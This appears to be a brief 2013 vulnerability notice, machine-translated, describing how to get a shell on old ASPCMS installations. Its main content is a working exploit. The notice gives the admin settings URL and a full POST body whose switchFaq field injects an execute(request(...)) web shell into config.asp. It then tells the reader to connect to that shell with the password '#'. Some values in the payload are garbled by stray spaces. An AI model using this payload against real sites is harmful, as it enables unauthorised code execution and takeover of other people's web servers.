ASPCMS old version spike get SHELL-vulnerability warning-the black bar safety net

2013-02-02T00:00:00
ID MYHACK58:62201337121
Type myhack58
Reporter 佚名
Modified 2013-02-02T00:00:00

Description

Old ASPCMS version of the Spike to get SHELL vulnerability

Find a background that... Then

/admin/_system/AspCms_SiteSetting. asp? action=saves

Direct POST

runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(3 5)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha& waterMarkLocation=1&smtp_usermail=aspcmstest%4 0 1 6 3. com&smtp_user=aspcmstest&smtp_password=aspcms. cn&smtp_server=smtp. 1 6 3. com&MessageAlertsEmail=1 3 3 2 2 7 1 2%40qq. com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1

Then connect the configuration file config. asp password#